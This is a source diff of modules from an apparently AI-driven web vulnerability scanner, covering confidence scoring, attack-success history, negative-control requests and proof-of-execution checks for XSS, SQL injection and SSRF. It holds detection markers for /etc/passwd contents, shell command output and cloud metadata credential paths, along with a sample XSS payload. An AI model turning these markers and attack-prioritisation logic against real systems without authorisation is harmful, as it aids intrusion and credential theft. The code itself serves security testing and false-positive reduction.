3. The impact if chained together
4. Priority (critical/high/medium)
Return ONLY realistic chains where one finding directly enables or amplifies another.
If no meaningful chains exist, say "No chains identified."
Format each chain as: CHAIN: [scenario] | FINDINGS: [types] | IMPACT: [impact] | PRIORITY: [level]"""
            result = await llm.generate(prompt)
            if not result:
                return []
            # Parse the pipe-delimited CHAIN lines the prompt asked for.
            chains = []
            for line in result.strip().split("\n"):
                if line.startswith("CHAIN:"):
                    parts = line.split("|")
                    chain = {
                        "scenario": parts[0].replace("CHAIN:", "").strip() if len(parts) > 0 else "",
                        "findings": parts[1].replace("FINDINGS:", "").strip() if len(parts) > 1 else "",
                        "impact": parts[2].replace("IMPACT:", "").strip() if len(parts) > 2 else "",
                        "priority": parts[3].replace("PRIORITY:", "").strip() if len(parts) > 3 else "medium",
                    }
                    chains.append(chain)
            return chains
        except Exception as e:
            logger.debug(f"AI chain correlation failed: {e}")
            return []

    # --- Reporting ---------------------------------------------------------
    def get_attack_graph(self) -> Dict[str, List[str]]:
        """Get the attack chain graph."""
        return dict(self._chain_graph)

    def get_chain_stats(self) -> Dict:
        """Get chain statistics for reporting."""
        return {
            "total_chains_generated": self._total_chains,
            "graph_nodes": len(self._chain_graph),
            "chain_findings": len(self._chain_findings),
        }
+179
View File
@@ -0,0 +1,179 @@
"""
NeuroSploit v3 - Confidence Scoring Engine
Numeric 0-100 confidence scoring for vulnerability findings.
Combines proof of execution, negative control results, and signal analysis
into a single score with transparent breakdown.
Score Thresholds:
>= 90 → "confirmed" (AI Verified, high confidence)
>= 60 → "likely" (needs manual review)
< 60 → "rejected" (auto-reject, false positive)
"""
import logging
from dataclasses import dataclass, field
from typing import Dict, List, Optional
logger = logging.getLogger(__name__)
# ---------------------------------------------------------------------------
# Result types
# ---------------------------------------------------------------------------
@dataclass
class ConfidenceResult:
    """Result of confidence scoring.

    Produced by ConfidenceScorer.calculate(); the verdict is derived from
    the numeric score via the scorer's fixed thresholds (>=90 confirmed,
    >=60 likely, otherwise rejected).
    """
    score: int  # 0-100
    verdict: str  # "confirmed" | "likely" | "rejected"
    breakdown: Dict[str, int] = field(default_factory=dict)  # Component scores (per scoring component)
    detail: str = ""  # Human-readable explanation of how the score was built
# ---------------------------------------------------------------------------
# Scorer
# ---------------------------------------------------------------------------
class ConfidenceScorer:
    """Calculates numeric confidence score 0-100 for vulnerability findings.

    Weights:
        +0-60  Proof of execution (per vuln type — the most important signal)
        +0-30  Proof of impact (severity-aware)
        +0-20  Negative controls passed (response differs from benign)
        -40    Only baseline diff signal (no actual proof of exploitation)
        -60    Same behavior on negative controls (critical false positive indicator)
        -40    AI interpretation says payload was ineffective
    """

    # Verdict thresholds: >= 90 "confirmed", >= 60 "likely", else "rejected".
    THRESHOLD_CONFIRMED = 90
    THRESHOLD_LIKELY = 60

    # Weight caps for the positive components.
    MAX_PROOF_SCORE = 60
    MAX_IMPACT_SCORE = 30
    MAX_CONTROLS_BONUS = 20
    # Penalties (negative contributions).
    PENALTY_ONLY_DIFF = -40
    PENALTY_SAME_BEHAVIOR = -60
    PENALTY_AI_INEFFECTIVE = -40

    # Keywords in AI interpretation that indicate payload was ineffective.
    # Matched as plain substrings against the lower-cased interpretation text.
    INEFFECTIVE_KEYWORDS = [
        "ignored", "not processed", "blocked", "filtered",
        "sanitized", "rejected", "not executed", "was not",
        "does not", "did not", "no effect", "no impact",
        "benign", "safe", "harmless",
    ]

    def calculate(
        self,
        signals: List[str],
        proof_result,  # ProofResult from proof_of_execution
        control_result,  # NegativeControlResult from negative_control
        ai_interpretation: Optional[str] = None,
    ) -> ConfidenceResult:
        """Calculate confidence score from all verification components.

        Args:
            signals: List of signal names from multi_signal_verify
                (e.g., ["baseline_diff", "payload_effect"])
            proof_result: ProofResult from ProofOfExecution.check()
            control_result: NegativeControlResult from NegativeControlEngine
            ai_interpretation: Optional AI response interpretation text

        Returns:
            ConfidenceResult with score, verdict, breakdown, and detail
        """
        breakdown: Dict[str, int] = {}
        score = 0
        # ── Component 1: Proof of Execution (0-60) ────────────────────
        # Capped in case a proof method ever reports more than the max.
        proof_score = min(proof_result.score, self.MAX_PROOF_SCORE) if proof_result else 0
        score += proof_score
        breakdown["proof_of_execution"] = proof_score
        # ── Component 2: Proof of Impact (0-30) ───────────────────────
        # Only awarded when execution itself was proven.
        impact_score = 0
        if proof_result and proof_result.proven:
            if proof_result.impact_demonstrated:
                impact_score = self.MAX_IMPACT_SCORE  # Full impact shown
            else:
                impact_score = 15  # Proven but no impact demonstration
        score += impact_score
        breakdown["proof_of_impact"] = impact_score
        # ── Component 3: Negative Controls (bonus/penalty) ─────────────
        controls_score = 0
        if control_result:
            if control_result.same_behavior:
                controls_score = self.PENALTY_SAME_BEHAVIOR  # -60
            else:
                controls_score = min(
                    self.MAX_CONTROLS_BONUS,
                    control_result.confidence_adjustment
                )  # +20
        score += controls_score
        breakdown["negative_controls"] = controls_score
        # ── Penalty: Only baseline diff signal ─────────────────────────
        diff_penalty = 0
        if signals and set(signals) <= {"baseline_diff", "new_errors"}:
            # Only diff-based signals, no actual payload effect
            if proof_score == 0:
                diff_penalty = self.PENALTY_ONLY_DIFF  # -40
        score += diff_penalty
        breakdown["diff_only_penalty"] = diff_penalty
        # ── Penalty: AI says payload was ineffective ──────────────────
        ai_penalty = 0
        if ai_interpretation:
            ai_lower = ai_interpretation.lower()
            if any(kw in ai_lower for kw in self.INEFFECTIVE_KEYWORDS):
                ai_penalty = self.PENALTY_AI_INEFFECTIVE  # -40
        score += ai_penalty
        breakdown["ai_ineffective_penalty"] = ai_penalty
        # ── Clamp and determine verdict ────────────────────────────────
        score = max(0, min(100, score))
        if score >= self.THRESHOLD_CONFIRMED:
            verdict = "confirmed"
        elif score >= self.THRESHOLD_LIKELY:
            verdict = "likely"
        else:
            verdict = "rejected"
        # Build detail string (human-readable trace of each component).
        detail_parts = []
        if proof_result and proof_result.proven:
            detail_parts.append(f"Proof: {proof_result.proof_type} ({proof_score}pts)")
        else:
            detail_parts.append("No proof of execution (0pts)")
        if impact_score > 0:
            detail_parts.append(f"Impact: +{impact_score}pts")
        if control_result:
            if control_result.same_behavior:
                detail_parts.append(
                    f"NEGATIVE CONTROL FAIL: {control_result.controls_matching}/"
                    f"{control_result.controls_run} same behavior ({controls_score}pts)")
            else:
                detail_parts.append(f"Controls passed (+{controls_score}pts)")
        if diff_penalty:
            detail_parts.append(f"Only-diff penalty ({diff_penalty}pts)")
        if ai_penalty:
            detail_parts.append(f"AI-ineffective penalty ({ai_penalty}pts)")
        detail = f"Score: {score}/100 [{verdict}] — " + "; ".join(detail_parts)
        return ConfidenceResult(
            score=score,
            verdict=verdict,
            breakdown=breakdown,
            detail=detail,
        )
+159
View File
@@ -0,0 +1,159 @@
"""
NeuroSploit v3 - Execution History
Tracks attack success/failure patterns across scans to learn what works.
Records technology-to-vulnerability-type mappings with success rates.
Used by the AI to prioritize tests based on historical data.
"""
import json
import logging
from datetime import datetime
from pathlib import Path
from typing import Dict, List, Optional
from collections import defaultdict
from urllib.parse import urlparse
logger = logging.getLogger(__name__)
class ExecutionHistory:
    """Tracks which attacks work against which technologies across scans.

    Maintains a bounded rolling list of individual attack records plus
    aggregated tech -> vuln_type success/fail counters. The aggregates are
    used to prioritize vulnerability types and to build AI prompt context.
    """

    MAX_ATTACKS = 500   # Keep last N attack records (in memory and on disk)
    SAVE_INTERVAL = 20  # Auto-save after this many record() calls

    def __init__(self, history_file: str = "data/execution_history.json"):
        """Initialize and load any prior history from *history_file*."""
        self.history_file = Path(history_file)
        self._attacks: List[Dict] = []
        # tech_lower -> vuln_type -> {"success": int, "fail": int}
        self._tech_success: Dict[str, Dict[str, Dict[str, int]]] = {}
        self._dirty = False
        # Dedicated counter for periodic auto-save: unlike
        # len(self._attacks) % N, it stays correct after trimming.
        self._records_since_save = 0
        self._load()

    def _load(self):
        """Load execution history from disk (best-effort; never raises)."""
        if not self.history_file.exists():
            return
        try:
            data = json.loads(self.history_file.read_text())
            self._attacks = data.get("attacks", [])
            # Rebuild counters defensively so malformed entries default to 0.
            for tech, vulns in data.get("tech_success", {}).items():
                self._tech_success[tech] = {}
                for vuln, counts in vulns.items():
                    self._tech_success[tech][vuln] = {
                        "success": counts.get("success", 0),
                        "fail": counts.get("fail", 0),
                    }
            logger.info(f"Loaded execution history: {len(self._attacks)} attacks, "
                        f"{len(self._tech_success)} technologies tracked")
        except Exception as e:
            logger.warning(f"Failed to load execution history: {e}")

    def _save(self):
        """Persist execution history to disk (best-effort; never raises)."""
        try:
            self.history_file.parent.mkdir(parents=True, exist_ok=True)
            self.history_file.write_text(json.dumps({
                "attacks": self._attacks[-self.MAX_ATTACKS:],
                "tech_success": self._tech_success,
                "saved_at": datetime.utcnow().isoformat(),
            }, indent=2, default=str))
            self._dirty = False
        except Exception as e:
            logger.warning(f"Failed to save execution history: {e}")

    def record(self, tech_stack: List[str], vuln_type: str,
               target: str, success: bool, evidence: str = ""):
        """Record an attack attempt result.

        Args:
            tech_stack: Detected technologies (first 5 kept, names truncated).
            vuln_type: Vulnerability type key; falsy values are ignored.
            target: Target URL (only the domain is stored).
            success: Whether the attack succeeded.
            evidence: Optional evidence string (first 100 chars kept).
        """
        if not vuln_type:
            return
        tech_stack = tech_stack or []  # tolerate None from callers
        # Record the individual attack (domain only, to limit stored data)
        try:
            domain = urlparse(target).netloc if target else ""
        except Exception:
            domain = ""
        self._attacks.append({
            "tech": [t[:50] for t in tech_stack[:5]],
            "vuln_type": vuln_type,
            "target_domain": domain,
            "success": success,
            "evidence_preview": (evidence or "")[:100],
            "timestamp": datetime.utcnow().isoformat(),
        })
        # FIX: bound in-memory growth too — previously only the on-disk copy
        # was trimmed, so long-running sessions grew without limit.
        if len(self._attacks) > self.MAX_ATTACKS:
            self._attacks = self._attacks[-self.MAX_ATTACKS:]
        # Update aggregated tech_success counters
        key = "success" if success else "fail"
        for tech in tech_stack[:5]:
            tech_lower = tech.lower().strip()
            if not tech_lower:
                continue
            bucket = self._tech_success.setdefault(tech_lower, {})
            counts = bucket.setdefault(vuln_type, {"success": 0, "fail": 0})
            counts[key] += 1
        # Auto-save periodically (every SAVE_INTERVAL records)
        self._dirty = True
        self._records_since_save += 1
        if self._records_since_save >= self.SAVE_INTERVAL:
            self._save()
            self._records_since_save = 0

    def flush(self):
        """Force save if there are unsaved changes."""
        if self._dirty:
            self._save()

    def get_priority_types(self, tech_stack: List[str], top_n: int = 15) -> List[str]:
        """Get vuln types most likely to succeed based on tech stack history.

        Types need at least 2 recorded attempts per technology to count;
        ranking weighs both success rate and attempt volume.
        """
        scores: Dict[str, float] = defaultdict(float)
        for tech in tech_stack:
            tech_lower = tech.lower().strip()
            if tech_lower not in self._tech_success:
                continue
            for vuln_type, counts in self._tech_success[tech_lower].items():
                total = counts.get("success", 0) + counts.get("fail", 0)
                if total < 2:
                    continue  # Need at least 2 data points
                rate = counts.get("success", 0) / total
                # Weight by both success rate and volume
                scores[vuln_type] += rate * total
        sorted_types = sorted(scores.items(), key=lambda x: x[1], reverse=True)
        return [t[0] for t in sorted_types[:top_n]]

    def get_stats_for_prompt(self, tech_stack: List[str]) -> str:
        """Format execution history as context lines for AI prompts.

        Returns per-technology "vuln(success/total)" summaries for up to
        5 technologies, or a placeholder line when nothing is recorded.
        """
        lines = []
        for tech in tech_stack[:5]:
            tech_lower = tech.lower().strip()
            if tech_lower not in self._tech_success:
                continue
            vulns = self._tech_success[tech_lower]
            top = sorted(
                vulns.items(),
                key=lambda x: x[1].get("success", 0),
                reverse=True
            )[:5]
            if top:
                entries = []
                for v, c in top:
                    s = c.get("success", 0)
                    total = s + c.get("fail", 0)
                    entries.append(f"{v}({s}/{total})")
                lines.append(f"  {tech}: {', '.join(entries)}")
        return "\n".join(lines) if lines else "  No historical data yet"

    def get_total_attacks(self) -> int:
        """Get total number of recorded attacks currently held in memory."""
        return len(self._attacks)

    def get_success_rate(self) -> float:
        """Get overall success rate across recorded attacks (0.0 if none)."""
        if not self._attacks:
            return 0.0
        successes = sum(1 for a in self._attacks if a.get("success"))
        return successes / len(self._attacks)
+321
View File
@@ -0,0 +1,321 @@
"""
NeuroSploit v3 - Negative Control Engine
Sends benign/control payloads and compares responses to detect false positives
from same-behavior patterns. If the application responds the same way to a
benign value as it does to an attack payload, the finding is likely a false positive.
"""
import hashlib
import logging
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Optional, Tuple, Any
from urllib.parse import urlparse, parse_qs, urlencode, urlunparse
logger = logging.getLogger(__name__)
# ---------------------------------------------------------------------------
# Result types
# ---------------------------------------------------------------------------
@dataclass
class ControlTestResult:
    """Result of a single control test (one benign/empty/omitted request)."""
    control_type: str  # "benign", "empty", "no_param"
    control_value: str  # The control payload used (truncated to 50 chars)
    status_match: bool  # Did status code match attack response?
    length_similar: bool  # Body length within threshold?
    hash_match: bool  # Exact body match (MD5 of the body)?
    same_behavior: bool  # Overall: does this control look the same as the attack?
    detail: str = ""  # Human-readable comparison summary
@dataclass
class NegativeControlResult:
    """Aggregated result of all negative control tests for one finding."""
    same_behavior: bool  # True if ANY control shows same behavior as attack
    controls_run: int  # How many controls were executed
    controls_matching: int  # How many showed same behavior
    confidence_adjustment: int  # Penalty to apply (typically -60 if same_behavior)
    results: List[ControlTestResult] = field(default_factory=list)  # Per-control details
    detail: str = ""  # Human-readable summary of the control run
# ---------------------------------------------------------------------------
# Engine
# ---------------------------------------------------------------------------
class NegativeControlEngine:
    """Sends control payloads to detect false positives from same-behavior responses.

    The key insight: if the application responds identically to "test123" and
    to "<script>alert(1)</script>", then the XSS payload was NOT processed —
    the application simply ignores or sanitizes the parameter entirely.
    """

    # Benign values that should NEVER trigger a vulnerability
    BENIGN_PAYLOADS: Dict[str, List[str]] = {
        # XSS: plain text, no special chars
        "xss_reflected": ["test123", "hello world"],
        "xss_stored": ["test123", "hello world"],
        "xss_dom": ["test123", "hello world"],
        "xss": ["test123", "hello world"],
        # SQLi: normal numeric/text values
        "sqli": ["1", "test"],
        "sqli_error": ["1", "test"],
        "sqli_union": ["1", "test"],
        "sqli_blind": ["1", "test"],
        "sqli_time": ["1", "test"],
        # SSRF: safe external URL or plain text
        "ssrf": ["https://www.example.com", "test"],
        "ssrf_cloud": ["https://www.example.com", "test"],
        # LFI: safe existing page or plain text
        "lfi": ["index.html", "test.txt"],
        "path_traversal": ["index.html", "test.txt"],
        # SSTI: plain text, no template syntax
        "ssti": ["hello", "12345"],
        # RCE: plain text, no shell metacharacters
        "rce": ["test", "hello"],
        "command_injection": ["test", "hello"],
        # Open redirect: safe internal URL
        "open_redirect": ["/", "/index.html"],
        # CRLF: normal header value
        "crlf_injection": ["test-value", "normal"],
        "header_injection": ["test-value", "normal"],
        # XXE: plain text (no XML entities)
        "xxe": ["test", "hello"],
        # NoSQL: normal value
        "nosql_injection": ["test", "1"],
        # Host header: normal hostname
        "host_header_injection": ["localhost", "example.com"],
        # Default for any unlisted type
        "default": ["test123", "benign_value"],
    }

    # Body length similarity threshold (percentage)
    LENGTH_THRESHOLD_PCT = 5.0  # Within 5% = "same"

    async def run_controls(
        self,
        url: str,
        param: str,
        method: str,
        vuln_type: str,
        attack_response: Dict,
        make_request_fn: Callable,
        baseline: Optional[Dict] = None,
        injection_point: str = "parameter",
    ) -> NegativeControlResult:
        """Run negative control tests and compare with the attack response.

        Args:
            url: Target URL
            param: Parameter name being tested
            method: HTTP method
            vuln_type: Vulnerability type
            attack_response: The response from the attack payload
            make_request_fn: Async function to make HTTP requests
            baseline: Optional baseline response
            injection_point: Where payload is injected (parameter, header, body, path)

        Returns:
            NegativeControlResult with same_behavior flag and details
        """
        results: List[ControlTestResult] = []
        controls_matching = 0
        attack_status = attack_response.get("status", 0)
        attack_body = attack_response.get("body", "")
        attack_length = len(attack_body)
        attack_hash = hashlib.md5(
            attack_body.encode("utf-8", errors="replace")
        ).hexdigest()
        # Get benign payloads for this vuln type (exact key first, then the
        # base type before the first underscore, then the default set).
        base_type = vuln_type.split("_")[0] if "_" in vuln_type else vuln_type
        benign_values = self.BENIGN_PAYLOADS.get(
            vuln_type,
            self.BENIGN_PAYLOADS.get(base_type, self.BENIGN_PAYLOADS["default"])
        )
        # Control 1: Benign payload
        for benign in benign_values[:2]:
            try:
                control_resp = await self._send_control(
                    url, param, method, benign, make_request_fn, injection_point
                )
                if control_resp:
                    result = self._compare_responses(
                        "benign", benign, attack_status, attack_length,
                        attack_hash, control_resp
                    )
                    results.append(result)
                    if result.same_behavior:
                        controls_matching += 1
            except Exception as e:
                logger.debug(f"Negative control (benign) failed: {e}")
        # Control 2: Empty value
        try:
            control_resp = await self._send_control(
                url, param, method, "", make_request_fn, injection_point
            )
            if control_resp:
                result = self._compare_responses(
                    "empty", "", attack_status, attack_length,
                    attack_hash, control_resp
                )
                results.append(result)
                if result.same_behavior:
                    controls_matching += 1
        except Exception as e:
            logger.debug(f"Negative control (empty) failed: {e}")
        # Control 3: Request without the parameter entirely (if applicable)
        if injection_point == "parameter" and param:
            try:
                control_resp = await self._send_without_param(
                    url, param, method, make_request_fn
                )
                if control_resp:
                    result = self._compare_responses(
                        "no_param", "(omitted)", attack_status, attack_length,
                        attack_hash, control_resp
                    )
                    results.append(result)
                    if result.same_behavior:
                        controls_matching += 1
            except Exception as e:
                logger.debug(f"Negative control (no_param) failed: {e}")
        # Determine overall same_behavior
        controls_run = len(results)
        same_behavior = controls_matching > 0
        # Build detail string
        if same_behavior:
            matching_types = [r.control_type for r in results if r.same_behavior]
            detail = (f"NEGATIVE CONTROL FAILED: {controls_matching}/{controls_run} "
                      f"controls show same behavior as attack ({', '.join(matching_types)})")
        elif controls_run:
            detail = f"Negative controls passed: 0/{controls_run} controls match attack response"
        else:
            # FIX: previously zero executed controls still reported "passed".
            detail = "Negative controls inconclusive: no controls could be executed"
        return NegativeControlResult(
            same_behavior=same_behavior,
            controls_run=controls_run,
            controls_matching=controls_matching,
            # FIX: only grant the +20 bonus when at least one control actually
            # ran and differed; zero executed controls is no evidence at all.
            confidence_adjustment=-60 if same_behavior else (20 if controls_run else 0),
            results=results,
            detail=detail,
        )

    async def _send_control(
        self,
        url: str,
        param: str,
        method: str,
        value: str,
        make_request_fn: Callable,
        injection_point: str,
    ) -> Optional[Dict]:
        """Send a control request with the given value at the injection point."""
        if injection_point == "parameter":
            return await make_request_fn(url, method, {param: value})
        elif injection_point == "header":
            # For header injection, we'd need to pass custom headers
            # Fall back to parameter injection for control testing
            return await make_request_fn(url, method, {param: value})
        elif injection_point == "path":
            # For path injection, append benign value to path
            parsed = urlparse(url)
            control_url = urlunparse(parsed._replace(
                path=parsed.path.rstrip("/") + "/" + value
            ))
            return await make_request_fn(control_url, method, {})
        elif injection_point == "body":
            return await make_request_fn(url, method, {param: value})
        else:
            return await make_request_fn(url, method, {param: value})

    async def _send_without_param(
        self,
        url: str,
        param: str,
        method: str,
        make_request_fn: Callable,
    ) -> Optional[Dict]:
        """Send request without the tested parameter."""
        # Strip the param from URL query string if present
        parsed = urlparse(url)
        if parsed.query:
            params = parse_qs(parsed.query, keep_blank_values=True)
            params.pop(param, None)
            new_query = urlencode(params, doseq=True)
            clean_url = urlunparse(parsed._replace(query=new_query))
        else:
            clean_url = url
        return await make_request_fn(clean_url, method, {})

    def _compare_responses(
        self,
        control_type: str,
        control_value: str,
        attack_status: int,
        attack_length: int,
        attack_hash: str,
        control_response: Dict,
    ) -> ControlTestResult:
        """Compare a control response against the attack response."""
        control_status = control_response.get("status", 0)
        control_body = control_response.get("body", "")
        control_length = len(control_body)
        control_hash = hashlib.md5(
            control_body.encode("utf-8", errors="replace")
        ).hexdigest()
        # Status code match
        status_match = (attack_status == control_status)
        # Body hash exact match
        hash_match = (attack_hash == control_hash)
        # Body length similarity (both empty = same; one empty = different)
        if attack_length == 0 and control_length == 0:
            length_similar = True
        elif attack_length == 0 or control_length == 0:
            length_similar = False
        else:
            diff_pct = abs(attack_length - control_length) / max(attack_length, 1) * 100
            length_similar = diff_pct <= self.LENGTH_THRESHOLD_PCT
        # Same behavior if status matches AND (exact hash match OR length similar)
        same_behavior = status_match and (hash_match or length_similar)
        detail = (f"{control_type}('{control_value[:30]}'): "
                  f"status {'=' if status_match else '!'}= {control_status}, "
                  f"len {control_length} "
                  f"({'same' if length_similar else 'different'} from {attack_length})"
                  f"{', EXACT MATCH' if hash_match else ''}")
        return ControlTestResult(
            control_type=control_type,
            control_value=control_value[:50],
            status_match=status_match,
            length_similar=length_similar,
            hash_match=hash_match,
            same_behavior=same_behavior,
            detail=detail,
        )
File diff suppressed because it is too large Load Diff
+873
View File
@@ -0,0 +1,873 @@
"""
NeuroSploit v3 - Proof of Execution Framework
Per-vulnerability-type verification that a payload was actually PROCESSED
by the application, not just reflected or ignored. Each vuln type has specific
proof requirements — a finding without proof of execution scores 0.
This replaces the fragmented evidence checking in _cross_validate_ai_claim()
and _strict_technical_verify() with a unified, per-type proof system.
"""
import re
import logging
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple
logger = logging.getLogger(__name__)
# ---------------------------------------------------------------------------
# Shared patterns (from response_verifier.py)
# ---------------------------------------------------------------------------
# Regexes whose presence in a response body indicates a database error was
# leaked (compiled with re.IGNORECASE below as _compiled_db_errors).
DB_ERROR_PATTERNS = [
    r"(?:sql|database|query)\s*(?:error|syntax|exception)",
    r"mysql_(?:fetch|query|num_rows|connect)",
    r"mysqli_",
    r"pg_(?:query|exec|prepare|connect)",
    r"sqlite3?\.\w+error",
    r"ora-\d{4,5}",
    r"mssql_query",
    r"sqlstate\[",
    r"odbc\s+driver",
    r"jdbc\s+exception",
    r"unclosed\s+quotation",
    r"you have an error in your sql",
    r"syntax error.*at line \d+",
]
# Literal substrings that identify well-known file contents
# (/etc/passwd entries, Windows boot.ini sections) for LFI/SSRF proof.
FILE_CONTENT_MARKERS = [
    "root:x:0:0:",
    "daemon:x:1:1:",
    "bin:x:2:2:",
    "www-data:",
    "[boot loader]",
    "[operating systems]",
    "[extensions]",
]
# Regexes for typical shell command output (id/uname) used as RCE proof
# (compiled below as _compiled_cmd_patterns).
COMMAND_OUTPUT_PATTERNS = [
    r"uid=\d+\(",
    r"gid=\d+\(",
    r"root:\w+:0:0:",
    r"/bin/(?:ba)?sh",
    r"Linux\s+\S+\s+\d+\.\d+",
]
# Template expression -> expected evaluated result for SSTI proof.
# ("7*'7'" -> "7777777" matches Python/Jinja-style string repetition.)
SSTI_EXPRESSIONS = {
    "7*7": "49",
    "7*'7'": "7777777",
    "3*3": "9",
}
# Cloud metadata markers for SSRF
SSRF_METADATA_MARKERS = [
    "ami-id", "ami-launch-index", "instance-id", "instance-type",
    "local-hostname", "local-ipv4", "public-hostname", "public-ipv4",
    "security-groups", "iam/info", "iam/security-credentials",
    "computeMetadata/v1", "metadata.google.internal",
    "169.254.169.254",  # Only if actual metadata content follows
]
# Internal content markers for SSRF
SSRF_INTERNAL_MARKERS = [
    "root:x:0:0:",  # /etc/passwd via SSRF
    "localhost",  # Internal service response
    "127.0.0.1",
    "internal server",
    "private network",
]
# ---------------------------------------------------------------------------
# Result type
# ---------------------------------------------------------------------------
@dataclass
class ProofResult:
    """Result of proof-of-execution check.

    A score of 0 means no proof of execution was found; such findings
    should receive a low overall confidence score.
    """
    proven: bool  # Was execution proven?
    proof_type: str  # Type of proof found (e.g., "db_error", "xss_auto_fire")
    detail: str  # Human-readable description
    score: int  # Confidence score contribution (0-60)
    impact_demonstrated: bool = False  # Was impact beyond mere detection shown?
# ---------------------------------------------------------------------------
# Proof Engine
# ---------------------------------------------------------------------------
# Pre-compiled once at import time; reused by the ProofOfExecution methods
# below so patterns are not recompiled on every response check.
_compiled_db_errors = [re.compile(p, re.IGNORECASE) for p in DB_ERROR_PATTERNS]
_compiled_cmd_patterns = [re.compile(p, re.IGNORECASE) for p in COMMAND_OUTPUT_PATTERNS]
class ProofOfExecution:
"""Per-vulnerability-type proof that the payload was executed/processed.
Each vuln type has specific criteria. If the proof method returns
score=0, the finding has NO proof of execution and should score low.
"""
def check(self, vuln_type: str, payload: str, response: Dict,
          baseline: Optional[Dict] = None) -> ProofResult:
    """Check for proof of execution for the given vulnerability type.

    Args:
        vuln_type: Vulnerability type key
        payload: The attack payload used
        response: HTTP response dict {status, headers, body}
        baseline: Optional baseline response for comparison

    Returns:
        ProofResult with proven flag, proof type, detail, and score
    """
    body = response.get("body", "")
    status = response.get("status", 0)
    headers = response.get("headers", {})
    # Route to type-specific proof method (e.g. "_proof_sqli_error")
    method_name = f"_proof_{vuln_type}"
    if not hasattr(self, method_name):
        # Try base type (e.g., sqli_error -> sqli)
        base = vuln_type.split("_")[0]
        method_name = f"_proof_{base}"
        if not hasattr(self, method_name):
            # NOTE(review): _proof_default receives vuln_type as an extra
            # leading argument, unlike the typed proof methods — confirm
            # its signature matches this call.
            return self._proof_default(vuln_type, payload, body, status,
                                       headers, baseline)
    return getattr(self, method_name)(payload, body, status, headers, baseline)
# ------------------------------------------------------------------
# XSS Proofs
# ------------------------------------------------------------------
def _proof_xss(self, payload: str, body: str, status: int,
               headers: Dict, baseline: Optional[Dict]) -> ProofResult:
    """Generic XSS entry point: delegates to the reflected-XSS proof."""
    return self._proof_xss_reflected(payload, body, status, headers, baseline)
def _proof_xss_reflected(self, payload: str, body: str, status: int,
                         headers: Dict, baseline: Optional[Dict]) -> ProofResult:
    """XSS proof: payload in executable/interactive HTML context.

    Reflection alone yields only a weak score (10, not proven); a
    context analysis must confirm an executable or interactive sink.
    """
    if not payload or not body:
        return ProofResult(False, "", "No payload or body", 0)
    # Check if payload is reflected at all (case-insensitive fallback)
    if payload not in body and payload.lower() not in body.lower():
        return ProofResult(False, "not_reflected",
                           "Payload not reflected in response", 0)
    # Use XSS context analyzer for definitive proof.
    # Optional project dependency — silently skipped if unavailable.
    try:
        from backend.core.xss_context_analyzer import analyze_xss_execution_context
        ctx = analyze_xss_execution_context(body, payload)
        if ctx["executable"]:
            # Auto-executing context (e.g. script sink) = full proof
            return ProofResult(
                True, "xss_auto_fire",
                f"Payload in auto-executing context: {ctx['detail']}",
                60, impact_demonstrated=True
            )
        if ctx["interactive"]:
            # Needs user interaction — proven but lower score, no impact
            return ProofResult(
                True, "xss_interactive",
                f"Payload in interactive context: {ctx['detail']}",
                40, impact_demonstrated=False
            )
    except ImportError:
        pass
    # Fallback: raw reflection without context analysis
    return ProofResult(
        False, "reflected_only",
        "Payload reflected but context not confirmed executable",
        10
    )
def _proof_xss_stored(self, payload: str, body: str, status: int,
                      headers: Dict, baseline: Optional[Dict]) -> ProofResult:
    """Stored XSS: same as reflected but requires payload on display page."""
    # Caller is expected to pass the display page's response as `body`.
    return self._proof_xss_reflected(payload, body, status, headers, baseline)
def _proof_xss_dom(self, payload: str, body: str, status: int,
                   headers: Dict, baseline: Optional[Dict]) -> ProofResult:
    """DOM XSS: payload in DOM sink (harder to verify without browser)."""
    # Static-response fallback only; true DOM proof needs a browser.
    return self._proof_xss_reflected(payload, body, status, headers, baseline)
# ------------------------------------------------------------------
# SQLi Proofs
# ------------------------------------------------------------------
def _proof_sqli(self, payload: str, body: str, status: int,
                headers: Dict, baseline: Optional[Dict]) -> ProofResult:
    """SQLi proof: DB error message caused by payload.

    Falls back to a boolean-based blind heuristic when a baseline is
    available (both status AND body length must differ, >30% length diff).
    """
    body_lower = body.lower()
    # Check for DB error patterns
    for pat in _compiled_db_errors:
        m = pat.search(body_lower)
        if m:
            # Verify error wasn't in baseline — a pre-existing error page
            # would match regardless of the payload.
            if baseline:
                baseline_body = baseline.get("body", "").lower()
                if pat.search(baseline_body):
                    continue  # Error exists in baseline — not induced
            return ProofResult(
                True, "db_error",
                f"SQL error induced: {m.group()[:80]}",
                60, impact_demonstrated=True
            )
    # Check for boolean-based blind: significant response diff
    if baseline:
        baseline_len = len(baseline.get("body", ""))
        body_len = len(body)
        baseline_status = baseline.get("status", 0)
        if status != baseline_status and body_len != baseline_len:
            diff_pct = abs(body_len - baseline_len) / max(baseline_len, 1) * 100
            if diff_pct > 30:
                # Weaker than an error message: proven but no impact shown
                return ProofResult(
                    True, "boolean_diff",
                    f"Boolean-based blind: {diff_pct:.0f}% response diff "
                    f"(status {baseline_status}->{status})",
                    50, impact_demonstrated=False
                )
    return ProofResult(False, "", "No SQL error or boolean diff detected", 0)
def _proof_sqli_error(self, payload: str, body: str, status: int,
                      headers: Dict, baseline: Optional[Dict]) -> ProofResult:
    """Error-based SQLi: same evidence rules as the generic SQLi proof."""
    return self._proof_sqli(payload, body, status, headers, baseline)
def _proof_sqli_union(self, payload: str, body: str, status: int,
                      headers: Dict, baseline: Optional[Dict]) -> ProofResult:
    """UNION-based SQLi: same evidence rules as the generic SQLi proof."""
    return self._proof_sqli(payload, body, status, headers, baseline)
def _proof_sqli_blind(self, payload: str, body: str, status: int,
                      headers: Dict, baseline: Optional[Dict]) -> ProofResult:
    """Blind SQLi: relies on the boolean-diff branch of the generic proof."""
    return self._proof_sqli(payload, body, status, headers, baseline)
def _proof_sqli_time(self, payload: str, body: str, status: int,
                     headers: Dict, baseline: Optional[Dict]) -> ProofResult:
    """Time-based SQLi: needs external timing measurement (lower score)."""
    # Time-based proof requires timing data not available in response alone
    # The timeout exception handler in the agent provides this signal.
    # NOTE(review): status == 0 is assumed to encode "request timed out" —
    # confirm callers set status to 0 on timeout.
    if status == 0:  # Timeout
        return ProofResult(
            True, "time_based",
            "Request timeout consistent with time-based injection",
            40, impact_demonstrated=False
        )
    return ProofResult(False, "", "No timing anomaly detected", 0)
# ------------------------------------------------------------------
# SSRF Proofs
# ------------------------------------------------------------------
def _proof_ssrf(self, payload: str, body: str, status: int,
                headers: Dict, baseline: Optional[Dict]) -> ProofResult:
